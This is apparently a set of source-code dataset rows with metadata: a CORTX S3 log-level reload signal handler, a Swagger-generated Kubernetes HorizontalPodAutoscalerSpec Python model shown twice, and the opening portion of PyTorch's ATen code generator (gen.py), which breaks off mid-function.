        sighupArg.config = CORTXS3Config()
        sighupArg.logger.setLevel(sighupArg.config.get_file_log_level())
        sighupArg.logger.info("Logging level has been changed")
| 32.84 | 85 | 0.75944 |
import os
import traceback
import logging
import datetime
import signal
from logging import handlers
from functools import partial
from s3backgrounddelete.cortx_s3_config import CORTXS3Config
class DynamicConfigHandler(object):
    """Signal handler class for dynamically changing config parameters.

    Registers a SIGHUP handler that reloads CORTXS3Config and re-applies the
    file log level on the supplied object.
    """
    def __init__(self,objectx):
        """Register the SIGHUP callback bound to `objectx` (must expose
        `config` and `logger` attributes)."""
        sighupArg=objectx
        # partial() forwards `objectx` ahead of the (signum, frame) arguments
        # supplied by the signal module.
        signal.signal(signal.SIGHUP,partial(self.sighup_handler_callback, sighupArg))
    def sighup_handler_callback(self, sighupArg, signum, frame):
        """Reload the configuration and re-apply the configured log level."""
        sighupArg.config = CORTXS3Config()
        sighupArg.logger.setLevel(sighupArg.config.get_file_log_level())
        sighupArg.logger.info("Logging level has been changed")
| true | true |
1c2c81bebf5a8a85417b4b94ae13c371cd878309 | 7,387 | py | Python | kubernetes/client/models/v1_horizontal_pod_autoscaler_spec.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_horizontal_pod_autoscaler_spec.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_horizontal_pod_autoscaler_spec.py | anemerovsky-essextec/python | 6e40b9169b27c3f1f9422c0f6dd1cd9caef8d57c | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1HorizontalPodAutoscalerSpec(object):
    """Swagger-generated model for the autoscaling/v1 HorizontalPodAutoscalerSpec.

    NOTE: Originally produced by the swagger code generator and then hand
    cleaned: the Python-2 `six.iteritems` shim was dropped in favor of plain
    ``dict.items()`` (this module is Python 3 only), and the dead second
    class-level string literal was converted into comments. The public
    interface is unchanged.
    """

    # swagger_types: attribute name -> declared swagger attribute type.
    swagger_types = {
        'max_replicas': 'int',
        'min_replicas': 'int',
        'scale_target_ref': 'V1CrossVersionObjectReference',
        'target_cpu_utilization_percentage': 'int'
    }

    # attribute_map: attribute name -> JSON key in the OpenAPI definition.
    attribute_map = {
        'max_replicas': 'maxReplicas',
        'min_replicas': 'minReplicas',
        'scale_target_ref': 'scaleTargetRef',
        'target_cpu_utilization_percentage': 'targetCPUUtilizationPercentage'
    }

    def __init__(self, max_replicas=None, min_replicas=None, scale_target_ref=None, target_cpu_utilization_percentage=None):
        """V1HorizontalPodAutoscalerSpec - a model defined in Swagger.

        :param max_replicas: required upper pod-count limit (int)
        :param min_replicas: optional lower pod-count limit (int)
        :param scale_target_ref: required reference to the scaled resource
        :param target_cpu_utilization_percentage: optional CPU target (int)
        :raises ValueError: if a required field is None
        """
        self._max_replicas = None
        self._min_replicas = None
        self._scale_target_ref = None
        self._target_cpu_utilization_percentage = None
        self.discriminator = None

        # Required fields go through their setters so that None is rejected.
        self.max_replicas = max_replicas
        if min_replicas is not None:
            self.min_replicas = min_replicas
        self.scale_target_ref = scale_target_ref
        if target_cpu_utilization_percentage is not None:
            self.target_cpu_utilization_percentage = target_cpu_utilization_percentage

    @property
    def max_replicas(self):
        """Upper limit for the number of pods that can be set by the autoscaler;
        cannot be smaller than min_replicas.

        :rtype: int
        """
        return self._max_replicas

    @max_replicas.setter
    def max_replicas(self, max_replicas):
        """Set max_replicas; required.

        :raises ValueError: if max_replicas is None
        """
        if max_replicas is None:
            raise ValueError("Invalid value for `max_replicas`, must not be `None`")

        self._max_replicas = max_replicas

    @property
    def min_replicas(self):
        """Lower limit for the number of pods that can be set by the autoscaler,
        default 1.

        :rtype: int
        """
        return self._min_replicas

    @min_replicas.setter
    def min_replicas(self, min_replicas):
        """Set min_replicas (optional)."""
        self._min_replicas = min_replicas

    @property
    def scale_target_ref(self):
        """Reference to the scaled resource.

        :rtype: V1CrossVersionObjectReference
        """
        return self._scale_target_ref

    @scale_target_ref.setter
    def scale_target_ref(self, scale_target_ref):
        """Set scale_target_ref; required.

        :raises ValueError: if scale_target_ref is None
        """
        if scale_target_ref is None:
            raise ValueError("Invalid value for `scale_target_ref`, must not be `None`")

        self._scale_target_ref = scale_target_ref

    @property
    def target_cpu_utilization_percentage(self):
        """Target average CPU utilization (percentage of requested CPU) over
        all the pods; the default autoscaling policy is used if unset.

        :rtype: int
        """
        return self._target_cpu_utilization_percentage

    @target_cpu_utilization_percentage.setter
    def target_cpu_utilization_percentage(self, target_cpu_utilization_percentage):
        """Set target_cpu_utilization_percentage (optional)."""
        self._target_cpu_utilization_percentage = target_cpu_utilization_percentage

    def to_dict(self):
        """Return the model properties as a dict; nested models (anything with
        a to_dict method) inside attributes, lists, or dict values are
        converted one level deep, matching the generated code's behavior."""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [v.to_dict() if hasattr(v, "to_dict") else v
                                for v in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {k: (v.to_dict() if hasattr(v, "to_dict") else v)
                                for k, v in value.items()}
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the pretty-printed string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Two specs are equal iff both are V1HorizontalPodAutoscalerSpec
        instances with equal state."""
        if not isinstance(other, V1HorizontalPodAutoscalerSpec):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
| 34.680751 | 179 | 0.656288 |
from pprint import pformat
from six import iteritems
import re
class V1HorizontalPodAutoscalerSpec(object):
    """Swagger-generated model for the autoscaling/v1 HorizontalPodAutoscalerSpec."""
    # swagger_types: attribute name -> declared swagger attribute type.
    swagger_types = {
        'max_replicas': 'int',
        'min_replicas': 'int',
        'scale_target_ref': 'V1CrossVersionObjectReference',
        'target_cpu_utilization_percentage': 'int'
    }
    # attribute_map: attribute name -> JSON key in the OpenAPI definition.
    attribute_map = {
        'max_replicas': 'maxReplicas',
        'min_replicas': 'minReplicas',
        'scale_target_ref': 'scaleTargetRef',
        'target_cpu_utilization_percentage': 'targetCPUUtilizationPercentage'
    }
    def __init__(self, max_replicas=None, min_replicas=None, scale_target_ref=None, target_cpu_utilization_percentage=None):
        """V1HorizontalPodAutoscalerSpec - a model defined in Swagger.

        max_replicas and scale_target_ref are required (their setters raise
        ValueError on None); the other two fields are optional.
        """
        self._max_replicas = None
        self._min_replicas = None
        self._scale_target_ref = None
        self._target_cpu_utilization_percentage = None
        self.discriminator = None
        # Required fields are routed through their setters so None is rejected.
        self.max_replicas = max_replicas
        if min_replicas is not None:
            self.min_replicas = min_replicas
        self.scale_target_ref = scale_target_ref
        if target_cpu_utilization_percentage is not None:
            self.target_cpu_utilization_percentage = target_cpu_utilization_percentage
    @property
    def max_replicas(self):
        """Upper limit for the number of pods set by the autoscaler (int)."""
        return self._max_replicas
    @max_replicas.setter
    def max_replicas(self, max_replicas):
        """Set max_replicas; required, must not be None."""
        if max_replicas is None:
            raise ValueError("Invalid value for `max_replicas`, must not be `None`")
        self._max_replicas = max_replicas
    @property
    def min_replicas(self):
        """Lower limit for the number of pods set by the autoscaler (int)."""
        return self._min_replicas
    @min_replicas.setter
    def min_replicas(self, min_replicas):
        """Set min_replicas (optional)."""
        self._min_replicas = min_replicas
    @property
    def scale_target_ref(self):
        """Reference to the scaled resource (V1CrossVersionObjectReference)."""
        return self._scale_target_ref
    @scale_target_ref.setter
    def scale_target_ref(self, scale_target_ref):
        """Set scale_target_ref; required, must not be None."""
        if scale_target_ref is None:
            raise ValueError("Invalid value for `scale_target_ref`, must not be `None`")
        self._scale_target_ref = scale_target_ref
    @property
    def target_cpu_utilization_percentage(self):
        """Target average CPU utilization percentage over all pods (int)."""
        return self._target_cpu_utilization_percentage
    @target_cpu_utilization_percentage.setter
    def target_cpu_utilization_percentage(self, target_cpu_utilization_percentage):
        """Set target_cpu_utilization_percentage (optional)."""
        self._target_cpu_utilization_percentage = target_cpu_utilization_percentage
    def to_dict(self):
        """Return the model properties as a dict, converting nested models
        (anything with a to_dict method) one level deep."""
        result = {}
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Return the pretty-printed string representation of the model."""
        return pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()
    def __eq__(self, other):
        """True iff both are V1HorizontalPodAutoscalerSpec with equal state."""
        if not isinstance(other, V1HorizontalPodAutoscalerSpec):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
| true | true |
1c2c83029d0adf88eed1e205553d2b7f3256f1ec | 73,836 | py | Python | tools/codegen/gen.py | hablb/pytorch | c17bc35f0e4551de300650d4702ebda4f57d77f9 | [
"Intel"
] | 2 | 2022-02-14T13:56:03.000Z | 2022-02-14T13:56:05.000Z | tools/codegen/gen.py | hablb/pytorch | c17bc35f0e4551de300650d4702ebda4f57d77f9 | [
"Intel"
] | null | null | null | tools/codegen/gen.py | hablb/pytorch | c17bc35f0e4551de300650d4702ebda4f57d77f9 | [
"Intel"
] | 1 | 2022-02-10T15:00:33.000Z | 2022-02-10T15:00:33.000Z | import os
from typing import List, Dict, Optional, Tuple, Set, Any, Union, Sequence, TypeVar
from typing_extensions import Literal
import yaml
from collections import OrderedDict, defaultdict, namedtuple
import argparse
import pathlib
import json
from dataclasses import dataclass
from tools.codegen.model import (Argument, DispatchKey, FunctionSchema,
Location, NativeFunction,
NativeFunctionsGroup, OperatorName,
BackendIndex, BackendMetadata,
OptionalType, SchemaKind, SelfArgument,
TensorOptionsArguments, Type, Variant,
is_cuda_dispatch_key,
is_generic_dispatch_key,
Tag, BaseOperatorName)
from tools.codegen.api.types import (Binding, CppSignature, CppSignatureGroup,
DispatcherSignature, NativeSignature)
from tools.codegen.api import cpp
import tools.codegen.api.dispatcher as dispatcher
import tools.codegen.api.native as native
import tools.codegen.api.meta as meta
import tools.codegen.api.structured as structured
from tools.codegen.api.translate import translate
from tools.codegen.selective_build.selector import SelectiveBuilder
from tools.codegen.utils import (
Target, concatMap, context, mapMaybe, YamlDumper, YamlLoader, FileManager, assert_never
)
from tools.codegen.context import (method_with_native_function,
native_function_manager,
with_native_function_and_indices,
with_native_function)
import tools.codegen.dest as dest
from tools.codegen.gen_functionalization_type import (
needs_functionalization,
gen_functionalization_definition,
gen_functionalization_registration,
gen_functionalization_view_inverse_declaration
)
# Generic type parameter used by helper signatures in this module.
T = TypeVar('T')
# Welcome to the ATen code generator v2! The ATen code generator is
# responsible for parsing native_functions.yaml and then generating
# various generated files (e.g., TypeDefault.cpp) based on the operators
# defined in this file. This means that the code generator knows how to
# parse function schema, and then translate this into various C++ types
# and boilerplate code.
#
# Some things to know about this file when you modify it:
#
# - This file has STRICT mypy typechecking. Typecheck it with
# `mypy --config mypy-strict.ini` in the root source directory
#
# - Most of the heavy lifting lives in external modules:
# - 'model' has the data model for native_functions.yaml. The classes
# in those file represent what you see when you look at
# a native_functions.yaml
# - 'api' has conversions for how to translate JIT schema into
# the various C++ APIs that the codegen interacts with. There
# are in fact THREE different C++ APIs: the public C++ API,
# the dispatcher API, and the legacy disaptcher API. See each
# of these respective files for more information
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# HELPER FUNCTIONS
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# A custom loader for YAML to let us also keep track of line numbers
# of each entry in the YAML file
class LineLoader(YamlLoader):
    """YAML loader that stamps each mapping with its 1-based source line.

    The line number is stored under the '__line__' key so that later error
    messages (see parse_native_yaml) can point at the offending
    native_functions.yaml entry.
    """
    def construct_mapping(self, node, deep=False):  # type: ignore[no-untyped-def]
        mapping = super().construct_mapping(node, deep=deep)  # type: ignore[no-untyped-call]
        # Add 1 so line numbering starts at 1
        mapping['__line__'] = node.start_mark.line + 1
        return mapping
# Memoizes parse_native_yaml results keyed by path, so multiple codegen entry
# points in the same process don't re-parse the (large) YAML file.
_GLOBAL_PARSE_NATIVE_YAML_CACHE = {}

# Parse native_functions.yaml into a sequence of NativeFunctions and Backend Indices.
ParsedYaml = namedtuple('ParsedYaml', ['native_functions', 'backend_indices'])
def parse_native_yaml(path: str) -> ParsedYaml:
    """Parse native_functions.yaml at `path` into NativeFunctions plus
    per-dispatch-key BackendIndices.

    Results are memoized per path in _GLOBAL_PARSE_NATIVE_YAML_CACHE so the
    file is only read and validated once per process.
    """
    global _GLOBAL_PARSE_NATIVE_YAML_CACHE
    if path not in _GLOBAL_PARSE_NATIVE_YAML_CACHE:
        with open(path, 'r') as f:
            es = yaml.load(f, Loader=LineLoader)
        assert isinstance(es, list)
        rs: List[NativeFunction] = []
        bs: Dict[DispatchKey, Dict[OperatorName, BackendMetadata]] = defaultdict(dict)
        for e in es:
            # LineLoader stamped every mapping with its 1-based source line;
            # use it to build a Location for error messages.
            assert isinstance(e.get('__line__'), int), e
            loc = Location(path, e['__line__'])
            funcs = e.get('func')
            with context(lambda: f'in {loc}:\n {funcs}'):
                func, m = NativeFunction.from_yaml(e, loc)
                rs.append(func)
                BackendIndex.grow_index(bs, m)
        # Cross-entry validation (per-entry checks happen in from_yaml).
        error_check_native_functions(rs)
        # Default dict is to prevent the codegen from barfing when we have a dispatch key that has no kernels yet.
        indices: Dict[DispatchKey, BackendIndex] = defaultdict(lambda: BackendIndex(
            dispatch_key=DispatchKey.Undefined,
            use_out_as_primary=True,
            external=False,
            device_guard=False,
            index={}))
        for k, v in bs.items():
            # All structured in-tree operators are implemented in terms of their out operator.
            indices[k] = BackendIndex(
                dispatch_key=k,
                use_out_as_primary=True,
                external=False,
                # Only cuda-like devices in tree require device guards
                device_guard=is_cuda_dispatch_key(k),
                index=v)
        _GLOBAL_PARSE_NATIVE_YAML_CACHE[path] = ParsedYaml(rs, indices)

    return _GLOBAL_PARSE_NATIVE_YAML_CACHE[path]
# Some assertions are already performed during parsing, but those are only within a single NativeFunction.
# Assertions here are meant to be performed across NativeFunctions.
def error_check_native_functions(funcs: Sequence[NativeFunction]) -> None:
    """Validate invariants that span multiple NativeFunctions.

    Per-entry checks are performed while parsing (NativeFunction.from_yaml);
    this pass checks cross-entry constraints:
      * a structured_delegate must point at an operator marked structured
      * a `tag: inplace_view` op must follow in-place naming (trailing
        underscore) and have a matching out-of-place base op

    Raises AssertionError with a descriptive message on violation.

    (Cleanup: the previously-computed `overload_name` local was unused and
    has been removed.)
    """
    # Index by full operator name and by base name for the lookups below.
    func_map: Dict[OperatorName, NativeFunction] = {}
    base_func_map: Dict[BaseOperatorName, List[NativeFunction]] = defaultdict(list)
    for f in funcs:
        func_map[f.func.name] = f
        base_func_map[f.func.name.name].append(f)
    for f in funcs:
        if f.structured_delegate is not None:
            delegate_func = func_map[f.structured_delegate]
            assert delegate_func.structured, \
                f"{f.func.name} is marked as a structured_delegate pointing to " \
                f"{f.structured_delegate}, but {f.structured_delegate} is not marked as structured. " \
                f"Consider adding 'structured=True' to the delegated operator"
        if f.tag is not None and f.tag is Tag.inplace_view:
            base_name = f.func.name.name
            assert base_name.inplace, \
                f"{f.func.name} is marked with tag: inplace_view, but it doesn't follow the naming " \
                "convention for inplace ops - the codegen expects the base name to have a trailing underscore. "
            out_of_place_base_name = BaseOperatorName(base_name.base, False, base_name.dunder_method)
            assert len(base_func_map[out_of_place_base_name]) > 0, \
                f"{f.func.name} is marked with tag: inplace_view. The codegen expects there to be a corresponding " \
                f"out-of-place view op with the name '{base_name}' and matching schema, but it didn't find one. "
def cpp_string(s: str) -> str:
    """Convert a python string into a c++ string literal """
    # The backslash is escaped first so the escapes added below are not
    # themselves re-escaped.
    replacements = (
        ('\\', '\\\\'),
        ('"', '\\"'),
        ('\a', '\\a'),
        ('\b', '\\b'),
        ('\f', '\\f'),
        ('\n', '\\n'),
        ('\v', '\\v'),
        ('\t', '\\t'),
    )
    for raw, escaped in replacements:
        s = s.replace(raw, escaped)
    return f'"{s}"'
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# C++ CODE GENERATION
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Most functions in this section are curried: they consist of a function
# that takes some parameters (e.g., what is to be generated) which itself
# returns a function that actually maps NativeFunction to the code
# to be generated. This pattern makes it convenient to use map, concatMap
# and similar functional combinators.
def static_dispatch_keys(backend: Optional[BackendIndex]) -> List[DispatchKey]:
    """Dispatch keys a static-dispatch build consults for `backend`
    (empty when no static-dispatch backend is configured)."""
    if backend is None:
        return []
    # The backend's own key plus the two composite alias keys.
    return [
        backend.dispatch_key,
        DispatchKey.CompositeImplicitAutograd,
        DispatchKey.CompositeExplicitAutograd,
    ]
def get_static_dispatch_backend(f: NativeFunction, backend_index: BackendIndex) -> Optional[DispatchKey]:
    """Pick the dispatch key a static-dispatch build should route `f` to,
    or None when no suitable kernel exists."""
    # TODO: for ops with structured_delegate it should check the dispatch table of
    # the out variant instead. For now, these structured ops all have CPU/CUDA kernels
    # so we always dispatch to the `backend`, but this could be wrong when we
    # migrate math/default_backend ops to use structured delegate.
    if f.structured_delegate is not None or backend_index.has_kernel(f):
        return backend_index.dispatch_key
    if f.has_composite_explicit_autograd_kernel:
        return DispatchKey.CompositeExplicitAutograd
    if f.has_composite_implicit_autograd_kernel:
        return DispatchKey.CompositeImplicitAutograd
    return None
def static_dispatch_ops_header(
        f: NativeFunction,
        backend_index: Optional[BackendIndex]) -> Optional[str]:
    """Per-operator #include for static dispatch, or None when static dispatch
    is disabled or the kernel is registered manually."""
    if backend_index is None or f.manual_kernel_registration:
        return None

    dispatch_key = get_static_dispatch_backend(f, backend_index)
    if dispatch_key is None:
        return None
    return f'#include <ATen/ops/{f.root_name}_{dispatch_key.lower()}_dispatch.h>'
def static_dispatch_extra_headers(backend: Optional[BackendIndex], skip_tensor_include: bool = False) -> List[str]:
    """#include lines for every dispatch key a static-dispatch build needs."""
    # See Note [Avoiding Include Cycles In Static Dispatch]
    maybe_inl = '_inl' if skip_tensor_include else ''
    headers = []
    for dispatch_key in static_dispatch_keys(backend):
        headers.append(f'#include <ATen/{dispatch_key}Functions{maybe_inl}.h>')
    return headers
def static_dispatch(
        f: NativeFunction, cpp_sig: CppSignature,
        *, method: bool, backend_index: Optional[BackendIndex]
) -> Optional[str]:
    """Return the C++ statement a static-dispatch build emits in place of a
    dispatcher call for `f`, or None when static dispatch is off
    (backend_index is None) or the kernel is registered manually.
    """
    if backend_index is None or f.manual_kernel_registration:
        return None

    # Translate from the caller's signature to the plain non-method function
    # signature, which is what the backend namespace functions
    # (at::<backend>::...) are declared with.
    target_sig = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=False).signature
    name = target_sig.name()
    exprs = translate(cpp_sig.arguments(), target_sig.arguments(), method=method)
    exprs_str = ', '.join(a.expr for a in exprs)

    dispatch_key = get_static_dispatch_backend(f, backend_index)
    if dispatch_key is not None:
        return f'return at::{dispatch_key.lower()}::{name}({exprs_str});'

    # No kernel available anywhere for this op under static dispatch:
    # emit a runtime failure.
    return f'TORCH_CHECK(false, "Static dispatch does not support {name} for {backend_index.dispatch_key}.");'
# Generates RegisterSchema.cpp. Depending on the selector, either
# all schemas are registered, or only some are (in the case of
# selective build)
@dataclass(frozen=True)
class RegisterSchema:
    """Emits one `m.def(...)` schema registration per selected operator for
    RegisterSchema.cpp; operators excluded by selective build produce None."""
    selector: SelectiveBuilder

    @method_with_native_function
    def __call__(self, f: NativeFunction) -> Optional[str]:
        if self.selector.is_native_function_selected(f):
            return f'm.def({cpp_string(str(f.func))});\n'
        return None
# Generates Operators.h and Operators.cpp.
# These provide macros that, given an operator and overload name, allow users
# to access an "un-overloaded" function version of the operator. This
# is useful for extension writers who want to (1) want to decltype the operator
# and (2) don't want to worry about method-only operators.
@dataclass(frozen=True)
class ComputeOperators:
    """Generates Operators.h / Operators.cpp: one at::_ops::<name> struct per
    operator overload carrying compile-time metadata plus call()/redispatch()
    entry points into the dispatcher (see Note [The ATen Operators API])."""
    target: Union[
        Literal[Target.DECLARATION],
        Literal[Target.DEFINITION]
    ]

    @method_with_native_function
    def __call__(self, f: NativeFunction) -> str:
        sig = DispatcherSignature.from_schema(f.func)
        name = f.func.name.unambiguous_name()
        call_method_name = 'call'
        redispatch_method_name = 'redispatch'

        if self.target is Target.DECLARATION:
            # Note [The ATen Operators API]
            # The ATen Operators API lives in the at::_ops namespace, and contains compile-time
            # metadata about each operator + entry points into the Dispatcher.
            # The C++ function, method, and redispatch API's are all implemented as wrappers
            # into various bits of the structs defined here.
            #
            # Important characteristics about the Operators API:
            # (1) It follows the Dispatcher API.
            #     This is kind of necessary to avoid overhead.
            #     For example: if it followed the C++ API, then all of the faithful C++ factory functions
            #     would need to wrap their arguments into TensorOptions only to unwrap them again.
            # (2) Overload names are disambiguated.
            #     This is helpful for pytorch extenders who would like to decltype() an aten operator,
            #     that has overloads, e.g. decltype(at::_ops::mul_Tensor::call)
            # (3) No argument defaulting is allowed.
            #     This is more of an implementation detail to avoid #include cycles,
            #     since TensorBody.h (which defines the Tensor class) needs to include this file.
            # (4) manual_cpp_bindings and faithful names are not included in the API.
            #     This applies to stuff like __dispatch__is_complex(), and add_outf().
            #     These aren't "real aten ops", they're just additional functions provided by the C++ API.
            #     They're implemented as wrappers in Functions.h that call into the actual operators
            #     defined here, i.e. at::_ops::is_complex::call() and at::_ops::add_out::call().
            #     This means that ATEN_OP(is_complex) will not fastpath, and will go through the dispatcher.
            return f"""
struct TORCH_API {name} {{
  using schema = {sig.type()};
  using ptr_schema = schema*;
  // See Note [static constexpr char* members for windows NVCC]
  STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(name, "aten::{f.func.name.name}")
  STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(overload_name, "{f.func.name.overload_name}")
  STATIC_CONSTEXPR_STR_INL_EXCEPT_WIN_CUDA(schema_str, {cpp_string(str(f.func))})
  static {sig.defn(name=call_method_name, is_redispatching_fn=False)};
  static {sig.defn(name=redispatch_method_name, is_redispatching_fn=True)};
}};"""
        elif self.target is Target.DEFINITION:
            defns = f"""
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, name, "aten::{f.func.name.name}")
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, overload_name, "{f.func.name.overload_name}")
STATIC_CONST_STR_OUT_OF_LINE_FOR_WIN_CUDA({name}, schema_str, {cpp_string(str(f.func))})

// aten::{f.func}
static C10_NOINLINE c10::TypedOperatorHandle<{name}::schema> create_{name}_typed_handle() {{
  return c10::Dispatcher::singleton()
      .findSchemaOrThrow({name}::name, {name}::overload_name)
      .typed<{name}::schema>();
}}
"""
            # Emit both the plain call() wrapper and the redispatch() variant,
            # which additionally threads an explicit DispatchKeySet through.
            for is_redispatching_fn in [False, True]:
                if is_redispatching_fn:
                    dispatcher_exprs_str = ', '.join(['dispatchKeySet'] + [a.name for a in sig.arguments()])
                    dispatcher_call = 'redispatch'
                    method_name = f'{name}::{redispatch_method_name}'
                else:
                    dispatcher_exprs_str = ', '.join([a.name for a in sig.arguments()])
                    dispatcher_call = 'call'
                    method_name = f'{name}::{call_method_name}'

                defns += f"""
// aten::{f.func}
{sig.defn(name=method_name, is_redispatching_fn=is_redispatching_fn)} {{
    static auto op = create_{name}_typed_handle();
    return op.{dispatcher_call}({dispatcher_exprs_str});
}}
"""
            return defns
        else:
            assert_never(self.target)
# Generates Function.h, which provides the functional public C++ API,
# and the scaffolding to call into the dispatcher from these functions.
@dataclass(frozen=True)
class ComputeFunction:
    """Generates Functions.h: the namespaced functional C++ API. Each function
    forwards into the dispatcher via at::_ops, or inlines a static dispatch
    block when a static-dispatch backend is configured."""
    static_dispatch_backend_index: Optional[BackendIndex]

    @method_with_native_function
    def __call__(self, f: NativeFunction) -> Optional[str]:
        # Only function-variant operators appear in Functions.h.
        if Variant.function not in f.variants:
            return None

        sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=f.manual_cpp_binding)

        def generate_defn(faithful: bool) -> str:
            # Pick either the faithful (dispatcher-ordered) or the user-facing
            # C++ signature.
            if faithful:
                sig = sig_group.faithful_signature
                assert sig is not None
            else:
                sig = sig_group.signature

            # See Note [The ATen Operators API]
            target_sig = DispatcherSignature.from_schema(f.func)
            exprs = translate(sig.arguments(), target_sig.arguments())
            exprs_str = ', '.join([e.expr for e in exprs])

            static_dispatch_block = static_dispatch(f, sig, method=False, backend_index=self.static_dispatch_backend_index)
            if static_dispatch_block is None:
                return f"""
// aten::{f.func}
TORCH_API inline {sig.decl()} {{
    return at::_ops::{f.func.name.unambiguous_name()}::call({exprs_str});
}}
"""
            else:
                return f"""
// aten::{f.func}
TORCH_API inline {sig.decl()} {{
    {static_dispatch_block}
}}
"""
        result = generate_defn(False)
        if sig_group.faithful_signature is not None:
            result += generate_defn(True)

        return result
# Generates TensorBody.h. This file provides the object-oriented (method-based)
# public C++ API, and the scaffolding to call into the dispatcher from these functions.
@dataclass(frozen=True)
class ComputeTensorMethod:
    """Generates TensorBody.h: the method-based public C++ API. Emits method
    declarations (DECLARATION) or inline Tensor:: definitions (DEFINITION)
    that forward into the dispatcher via at::_ops / static dispatch."""
    target: Union[
        Literal[Target.DECLARATION],
        Literal[Target.DEFINITION]
    ]
    static_dispatch_backend_index: Optional[BackendIndex]

    @method_with_native_function
    def __call__(self, f: NativeFunction) -> Optional[str]:
        # Only method-variant operators become Tensor methods.
        if Variant.method not in f.variants:
            return None

        assert not f.func.is_out_fn()
        assert f.func.arguments.self_arg is not None

        sig_group = CppSignatureGroup.from_native_function(f, method=True, fallback_binding=f.manual_cpp_binding)

        if self.target is Target.DECLARATION:
            result = f"{sig_group.signature.decl()} const;\n"
            if sig_group.faithful_signature is not None:
                result += f"{sig_group.faithful_signature.decl()} const;\n"
            return result

        if self.target is not Target.DEFINITION:
            assert_never(self.target)

        def generate_defn(faithful: bool) -> str:
            # Pick either the faithful (dispatcher-ordered) or the user-facing
            # method signature.
            if faithful:
                sig = sig_group.faithful_signature
                assert sig is not None
            else:
                sig = sig_group.signature

            target_sig = DispatcherSignature.from_schema(f.func)
            exprs = translate(sig.arguments(), target_sig.arguments(), method=True)
            exprs_str = ', '.join([e.expr for e in exprs])

            static_dispatch_block = static_dispatch(f, sig, method=True, backend_index=self.static_dispatch_backend_index)
            if static_dispatch_block is None:
                return f"""
// aten::{f.func}
inline {sig.defn(prefix="Tensor::")} const {{
    return at::_ops::{f.func.name.unambiguous_name()}::call({exprs_str});
}}
"""
            else:
                return f"""
// aten::{f.func}
inline {sig.defn(prefix="Tensor::")} const {{
    {static_dispatch_block}
}}
"""
        result = generate_defn(faithful=False)
        if sig_group.faithful_signature is not None:
            result += generate_defn(faithful=True)

        return result
# Generates RedispatchFunctions.h.
# This is similar to the C++ API defined in Functions.h, but provides access
# to the dispatcher's redispatch API.
@dataclass(frozen=True)
class ComputeRedispatchFunction:
    """Generates RedispatchFunctions.h: function-style wrappers over the
    dispatcher's redispatch API, which takes an explicit DispatchKeySet as
    the first argument."""

    @method_with_native_function
    def __call__(self, f: NativeFunction) -> Optional[str]:
        # We unconditionally generate function variants of the redispatch API.
        # This is mainly because we can namespace functions separately, but not methods,
        sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=f.manual_cpp_binding)

        def generate_defn(faithful: bool) -> str:
            if faithful:
                sig = sig_group.faithful_signature
                assert sig is not None
            else:
                sig = sig_group.signature

            target_sig = DispatcherSignature.from_schema(f.func)
            exprs = translate(sig.arguments(), target_sig.arguments())
            # Prepend the explicit DispatchKeySet that redispatch() requires.
            exprs_str = ', '.join(['dispatchKeySet'] + [a.expr for a in exprs])

            return f"""
// aten::{f.func}
TORCH_API inline {sig.decl(is_redispatching_fn=True)} {{
    return at::_ops::{f.func.name.unambiguous_name()}::redispatch({exprs_str});
}}
"""
        result = generate_defn(False)
        if sig_group.faithful_signature is not None:
            result += generate_defn(True)

        return result
# Generates ATenOpList.cpp, a runtime accessible list of all aten
# operators.
# TODO: This was historically used to help some JIT interop code
# figure out whether or not to treat aten namespace'd operators
# one way or another, we should reevaluate if this is actually needed.
@with_native_function
def compute_aten_op(f: NativeFunction) -> str:
    """Render one ATenOpList.cpp entry: a {name, overload} pair literal."""
    op_name = f.func.name
    return '{{"aten::{base}", "{overload}"}},'.format(
        base=op_name.name, overload=op_name.overload_name)
# Generates MetaFunctions.h
def compute_meta_function_declaration(g: NativeFunctionsGroup) -> Optional[str]:
